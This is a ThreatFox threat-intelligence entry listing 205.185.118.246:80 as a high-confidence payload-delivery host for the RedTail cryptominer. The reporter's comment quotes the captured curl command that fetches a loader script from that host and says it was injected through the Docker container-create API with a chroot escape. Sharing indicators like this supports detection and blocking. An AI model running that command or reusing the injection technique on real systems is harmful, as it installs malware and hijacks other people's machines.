ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 205.185.118.246:80.

Database Entry

Add tag Delete this IOC  Report False Positive Export IOC (JSON)    Export IOC (CSV)
IOC ID:1816896
IOC: 205.185.118.246:80
IOC Type :ip:port
Threat Type :payload_delivery
Malware: RedTail
Confidence Level : Confidence level is high (90%)
Is compromised? : False
ASN:AS53667 PONYNET
Country:- CA
First seen:2026-05-21 11:55:15 UTC
Last seen:never
UUID:20ca6622-54ed-11f1-b930-42010aa4000a
Reporter nullblue67
Reward 5 credits from ThreatFox
Tags:b2f628 cronb-loader docker-exploit Downloader

Avatar
nullblue67
Captured 2026-05-21 in Docker API exploit body. Payload: curl http://205.185.118.246/b2f628/cronb.sh - injected via Docker /containers/create with chroot /mnt/ escape. Drops redtail XMRig miner. 14/91 VT detections.